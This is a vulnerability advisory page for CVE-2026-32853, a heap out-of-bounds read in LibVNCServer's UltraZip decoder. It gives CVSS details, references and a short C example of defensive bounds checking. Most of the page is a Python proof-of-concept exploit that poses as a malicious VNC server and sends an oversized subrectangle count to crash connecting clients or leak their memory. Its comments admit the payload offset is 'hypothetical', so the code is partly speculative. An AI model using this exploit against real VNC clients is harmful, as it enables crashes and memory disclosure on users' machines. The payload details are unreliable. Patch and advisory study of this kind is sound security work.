Security Vulnerability Report
CVE-2026-32853 CVSS 8.1 HIGH

CVE-2026-32853

Published: 2026-03-24 18:16:09
Last Modified: 2026-03-25 20:48:31

Description

LibVNCServer versions 0.9.15 and prior (fixed in commit 009008e) contain a heap out-of-bounds read vulnerability in the UltraZip encoding handler that allows a malicious VNC server to cause information disclosure or application crash. Attackers can exploit improper bounds checking in the HandleUltraZipBPP() function by manipulating subrectangle header counts to read beyond the allocated heap buffer.
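As an added illustration (not LibVNCServer's code and not the fix from commit 009008e), this is the bounds-checking pattern this class of bug calls for: a decoder that takes a subrectangle count from the peer must confirm, before every header and every pixel read, that the bytes lie inside the buffer. The 12-byte header layout, the name `walk_subrects` and the sample bytes are assumptions constructed for the example.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Assumed layout: x, y, w, h (big-endian u16 each) + encoding (u32). */
#define SUBRECT_HDR 12u

static uint16_t rd16(const uint8_t *p) { return (uint16_t)((p[0] << 8) | p[1]); }

/* Walk `count` subrectangles stored in buf[0..len). Returns the number of
 * subrectangles consumed, or -1 as soon as a header or its pixel payload
 * would extend past the end of the buffer. Invariant: off <= len. */
int64_t walk_subrects(const uint8_t *buf, size_t len, uint32_t count, size_t bytes_pp)
{
    size_t off = 0;

    if (bytes_pp == 0 || bytes_pp > 4)
        return -1;
    for (uint32_t i = 0; i < count; i++) {
        if (len - off < SUBRECT_HDR)      /* header must fit in what is left */
            return -1;
        uint16_t w = rd16(buf + off + 4);
        uint16_t h = rd16(buf + off + 6);
        off += SUBRECT_HDR;

        /* w, h <= 65535 and bytes_pp <= 4: the product cannot overflow 64 bits */
        uint64_t need = (uint64_t)w * h * bytes_pp;
        if (need > len - off)             /* pixels must fit in what is left */
            return -1;
        /* a real decoder would pass buf + off, w and h to the framebuffer here */
        off += (size_t)need;
    }
    return (int64_t)count;
}

/* Constructed sample: one 2x1 subrectangle at 4 bytes per pixel (12 + 8 bytes). */
static const uint8_t SAMPLE[20] = {
    0, 0, 0, 0, 0, 2, 0, 1, 0, 0, 0, 0,   /* x=0 y=0 w=2 h=1 encoding=0 */
    1, 2, 3, 4, 5, 6, 7, 8                /* two pixels */
};

int main(void)
{
    printf("count=1 -> %lld\n", (long long)walk_subrects(SAMPLE, sizeof SAMPLE, 1, 4));
    printf("count=2 -> %lld\n", (long long)walk_subrects(SAMPLE, sizeof SAMPLE, 2, 4));
    return 0;
}
```

A count larger than the buffer can hold is rejected at the first header that does not fit, so the loop never dereferences memory past `buf + len`.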

CVSS Details

CVSS Score: 8.1
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:libvncserver_project:libvncserver:*:*:*:*:*:*:*:* - VULNERABLE
LibVNCServer <= 0.9.15

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import socket
import struct

# Proof of Concept for CVE-2026-32853
# This script acts as a malicious VNC server triggering the heap out-of-bounds read.

def send_vnc_handshake(sock):
    # Protocol Version handshake
    sock.send(b"RFB 003.008\n")
    sock.recv(12)  # Receive client version

    # Security types: None (1)
    sock.send(b"\x01\x01")
    sock.recv(1)  # Client security selection

    # SecurityResult: OK (0)
    sock.send(b"\x00\x00\x00\x00")
    sock.recv(1)  # ClientInit Shared flag

    # ServerInit: Fake dimensions and name
    framebuffer_width = 1024
    framebuffer_height = 768
    server_name = b"Exploit"
    msg = struct.pack("!HH16s", framebuffer_width, framebuffer_height, b"\x00" * 12) + struct.pack("!I", len(server_name)) + server_name
    sock.send(msg)

def send_malicious_ultrazip(sock):
    # FramebufferUpdate message
    sock.send(b"\x00\x00\x00\x01")  # Message type 0, padding

    # Rectangle header
    x, y = 0, 0
    w, h = 100, 100
    encoding = 16  # UltraZip encoding
    rect_header = struct.pack("!HHHHi", x, y, w, h, encoding)
    sock.send(rect_header)

    # Malicious UltraZip data
    # The vulnerability is triggered by manipulating subrectangle counts
    # causing HandleUltraZipBPP to read beyond the heap buffer.
    # Construct a payload with a high subrect count
    # Format: [Tile Header]... [Subrect Data]
    # Simplified payload structure demonstrating the trigger
    # In a real exploit, this would be carefully crafted to match the heap layout
    payload = b"\x00" * 24  # Minimal header
    # Manipulate the subrect count (hypothetical offset in the structure)
    # Setting a large number to force out-of-bounds read
    payload += struct.pack("!I", 0xFFFFFFFF)
    sock.send(payload)

def run_exploit(ip, port):
    server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    server.bind((ip, port))
    server.listen(1)
    print(f"[*] Listening on {ip}:{port}...")
    client, addr = server.accept()
    print(f"[*] Connection from {addr}")
    try:
        send_vnc_handshake(client)
        print("[*] Handshake complete.")
        # Trigger the vulnerability
        send_malicious_ultrazip(client)
        print("[*] Malicious UltraZip payload sent.")
    except Exception as e:
        print(f"[!] Error: {e}")
    finally:
        client.close()
        server.close()

if __name__ == "__main__":
    run_exploit("0.0.0.0", 5900)
```

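References

https://github.com/LibVNC/libvncserver/commit/009008e2f4d5a54dd71f422070df3af7b3dbc931 (Patch)
https://github.com/LibVNC/libvncserver/security/advisories/GHSA-87q7-v983-qwcj (Vendor Advisory)
https://www.vulncheck.com/advisories/libvncserver-ultrazip-encoding-heap-out-of-bounds-read (Exploit, Vendor Advisory)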
